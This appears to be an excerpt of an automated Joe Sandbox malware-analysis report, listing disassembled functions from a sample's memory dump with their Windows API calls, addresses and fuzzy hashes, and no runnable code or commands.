Instruction ID: e1c0a03b2c14835f9c5b0b9c894291ba2a0cd84527c182dd8c17dc499e2938c2
Opcode Fuzzy Hash: 4854badf3b05d3720f7afde46930b926d91a86b1f535f5b1dd1737cd43217433
Instruction Fuzzy Hash: 23414D72B15F488EEB008FB9D8403AC73B1E74D79CF005625EE9CA6B89EF3491648394

Function 00007FF6218B080C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B0892

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
Instruction ID: e26b55446c549381c7d165174375d99eeea14635eb655144c1399b101930001b
Opcode Fuzzy Hash: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
Instruction Fuzzy Hash: 4631AD22E1C64286FF516B559C8137C2AA0BF84BA4F860235EA6DC73D2CF7CE6518753

Function 00007FF6218520B0 Relevance: 1.6, APIs: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218521A7

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 0dc4bd21447900cdf4b649ea3939f0e0e23ac3b2276814324ccf81a8f1914140
Instruction ID: 447651feefbe937f73d108332a159b82f2057fbaeb0e073e6cb413ca5e2b99e9
Opcode Fuzzy Hash: 0dc4bd21447900cdf4b649ea3939f0e0e23ac3b2276814324ccf81a8f1914140
Instruction Fuzzy Hash: 1E310776B09B4992EF098F69D89026C3366EB88F89B558432CF4E87765DF3DD480C341

Function 00007FF6218B4E91 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6218B4EBF

Part of subcall function 00007FF6218B4FB8: GetModuleHandleExW.KERNEL32 ref: 00007FF6218B4FDD
Part of subcall function 00007FF6218B4FB8: GetProcAddress.KERNEL32 ref: 00007FF6218B4FF3
Part of subcall function 00007FF6218B4FB8: FreeLibrary.KERNEL32 ref: 00007FF6218B501A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
Instruction ID: a051ebbaf4144348ea99188553db8f87d1f7323d837f8b1474572ed833d54cfb
Opcode Fuzzy Hash: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
Instruction Fuzzy Hash: FE217C32A086418AEF248F64C8892AC37E0EB5471CF540635E66EC7BD6DF3CE684CB41

Function 00007FF6218CE200 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218CE15D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
Instruction ID: 8abfe2d071b54e014471b458c3fa52681d82cebca6ff7e290ebac0910bc941b8
Opcode Fuzzy Hash: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
Instruction Fuzzy Hash: 01115133A1DA4182EF659F119C801BEA664BFC5B80F584132EA8DD76D6DF3DE4208743

Function 00007FF6218CFEF8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218CFF1B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
Instruction ID: b9dc3d91ea4130719061bd46a585fd9d3933dc678c87684b1d4e520fb7f596b2
Opcode Fuzzy Hash: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
Instruction Fuzzy Hash: 18216232A1CA8287EF659F28E88037976A0EB85B94F544334EA5DC76D9DF3CD4008B01

Function 00007FF6218B54B4 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B54DF

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
Instruction ID: 8aeb993a585a8cf8818404e1bd8c164c1fecab68881940e5c26e27565814bdd3
Opcode Fuzzy Hash: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
Instruction Fuzzy Hash: 36113632A1D68282FB109B14ECC0579A3A5FF84744F590435EAADC77A6DF3CEA518B02

Function 00007FF62183F380 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62183F3E3

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: dd93e75b4ac0dc4f767d0ddc299421e67e8bda984551c044fb78716d973bbf86
Instruction ID: 6b3e8bc7ad79b282fd0963a24519746ef30b10e23a2151da7508d82299c922aa
Opcode Fuzzy Hash: dd93e75b4ac0dc4f767d0ddc299421e67e8bda984551c044fb78716d973bbf86
Instruction Fuzzy Hash: 92F0C2B2E0DA8581EF048B24E8843BD6351AB44F88F640031DA8C8A696DF7DC486C382

Function 00007FF621890E00 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF621890E48

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
Instruction ID: b78b17d76254b0d90c75247a52815e3443157d80b775b8f6e976a5fde2dca06c
Opcode Fuzzy Hash: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
Instruction Fuzzy Hash: 5601A225B1CA8585DF508F16B98052DA7A0FB88FD4F489130EE5D83B59DF2CD8418700

Function 00007FF621847633 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF621847676

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
Instruction ID: e522f7f675f98598b8edfaab15b7a7e9282c723edf4ec95b696927ee13e41db6
Opcode Fuzzy Hash: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
Instruction Fuzzy Hash: 2901E12660C98185DB70CB56F8942AA6364F788B94F544032DE8DC3B59DE3DD9468B01

Function 00007FF621869810 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621869877

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d7388cd4849d06226c8dee52599ce639ad4aa9c8ce15e2513ff72609de6562ea
Instruction ID: 8151fd371065ed0811f53ef1ee093129e6e38cb9ab852f23064f15d3f9784a3d
Opcode Fuzzy Hash: d7388cd4849d06226c8dee52599ce639ad4aa9c8ce15e2513ff72609de6562ea
Instruction Fuzzy Hash: E5F0BEA2F1CACA85EF199B60D88537D6351EB04B88F500830DB4DCBA8BDF7DD4948282

Function 00007FF6218A7374 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A7393

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
Instruction ID: 48fcca8e2ef8ae32082cdf59d1184a923397c8fe725d9efcc678fe1972ccd5b6
Opcode Fuzzy Hash: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
Instruction Fuzzy Hash: 79E09231A1DA4282EF656BA999D217C7260AF447F0F954331EB3CC22C6DF3D98645613

Function 00007FF6218BE9D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6218BE9E4

Part of subcall function 00007FF6218C0E6C: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6218C0E74
Part of subcall function 00007FF6218C0E6C: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6218C0E79

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
String ID:
API String ID: 1208906642-0
Opcode ID: 552cadb944fbfa7d273d14e6333c601f02b0659bfbb50ac822d976667c4bc77c
Instruction ID: cf3ddde78b128a6ae8201c70e00ffe252db64e62d53dab35ec8ea8ce29d79ad6
Opcode Fuzzy Hash: 552cadb944fbfa7d273d14e6333c601f02b0659bfbb50ac822d976667c4bc77c
Instruction Fuzzy Hash: 7AE0E256D0D28348FFA837651DC62B992442F21348E6012B8E9ADC21C3DE0E3A4A26A3

Function 00007FF6218CB4C0 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,?,?,?,00007FF62183E409), ref: 00007FF6218CB4C4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
Instruction ID: 55eff1e51ae386b37c551171bfaeab5557617721ab6b56854baadcbf77f9df31
Opcode Fuzzy Hash: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
Instruction Fuzzy Hash: A0C04819F1ED82D2EB682F729CC216212E0AB59751F880170D508C0290DEACE6E68A12

Function 00007FF6218CD0B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 00007FF6218CD0BD

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
Instruction ID: 66347ca4d8e3af9d9c0529553b4b9361b80fca0ee78e7901a717ad9ddc3737db
Opcode Fuzzy Hash: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
Instruction Fuzzy Hash: D4B09B75B188C0C3C611EF04DC810157371F79470DFD00010E24D81614CE1CD6158E00

Function 00007FF6218ADA30 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6218AA0C6,?,?,-2723E8D8DEBC5093,00007FF6218A4E71,?,?,?,?,00007FF6218AD3FC), ref: 00007FF6218ADA85

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
Instruction ID: 820311e8be6dd81d3a4ad9a716ad094085a4199a0ceb85eeb976eea639fc9029
Opcode Fuzzy Hash: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
Instruction Fuzzy Hash: A6F01784F0E60782FF585A629CE13B952816F89B90F4C9630CD1EC63D2FE2DF9808213

Function 00007FF6218AE8BC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF6218AE8FA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
Instruction ID: fdd891dcde4a81818c791ff0d8a24f08b031a8bbc506df1d28c6b6707f94a48f
Opcode Fuzzy Hash: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
Instruction Fuzzy Hash: 60F0F852F0D34A56FF946A629CC567512805F88BB5F5C0A30EDAEC53C2EE2CF5808213

Non-executed Functions

Function 00007FF62189A430 Relevance: 36.0, APIs: 19, Strings: 1, Instructions: 1015stringmemorynativeCOMMON

Download Yara Rule

APIs

RtlAcquirePebLock.NTDLL ref: 00007FF62189A473
NtAllocateVirtualMemory.NTDLL ref: 00007FF62189A4AB
lstrcpyW.KERNEL32 ref: 00007FF62189A50D
lstrcatW.KERNEL32 ref: 00007FF62189A5C2
NtAllocateVirtualMemory.NTDLL ref: 00007FF62189A649
lstrcpyW.KERNEL32 ref: 00007FF62189A6FC
RtlInitUnicodeString.NTDLL ref: 00007FF62189A711
RtlInitUnicodeString.NTDLL ref: 00007FF62189A726
LdrEnumerateLoadedModules.NTDLL ref: 00007FF62189A739
RtlReleasePebLock.NTDLL ref: 00007FF62189A73F

Part of subcall function 00007FF62188EED0: SHGetKnownFolderPath.SHELL32 ref: 00007FF62188EF29
Part of subcall function 00007FF62188EED0: CoTaskMemFree.OLE32 ref: 00007FF62188EFEA

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189A777
CoInitializeEx.OLE32 ref: 00007FF62189A7EA
lstrcpyW.KERNEL32 ref: 00007FF62189A9C9
lstrcatW.KERNEL32 ref: 00007FF62189ABCE
CoGetObject.OLE32 ref: 00007FF62189ABEC
lstrcpyW.KERNEL32 ref: 00007FF62189B269
lstrcatW.KERNEL32 ref: 00007FF62189B48C
CoGetObject.OLE32 ref: 00007FF62189B4AA
CoUninitialize.OLE32 ref: 00007FF62189B972

Strings

0, xrefs: 00007FF62189B0AA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: lstrcpy$lstrcat$AllocateInitLockMemoryObjectStringUnicodeVirtual$AcquireEnumerateFolderFreeInitializeKnownLoadedModulesPathReleaseTaskUninitialize_invalid_parameter_noinfo_noreturn
String ID: 0
API String ID: 2979746431-4108050209
Opcode ID: 6f64833e790f7e0edcf384b577052cb350e71bb1098933e63500ff1fc7ca060e
Instruction ID: 42195a5bbe9f662d084006c6c6cdfaf1c20ec03c3cc876378831a3fcb2083012
Opcode Fuzzy Hash: 6f64833e790f7e0edcf384b577052cb350e71bb1098933e63500ff1fc7ca060e
Instruction Fuzzy Hash: E6C2B936629F988AD7908F69E88165DB3B5F788B88B105225FFCD97B18EF38C154C740

Function 00007FF62188B420 Relevance: 33.7, APIs: 8, Strings: 11, Instructions: 465COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 00007FF62188B9A7
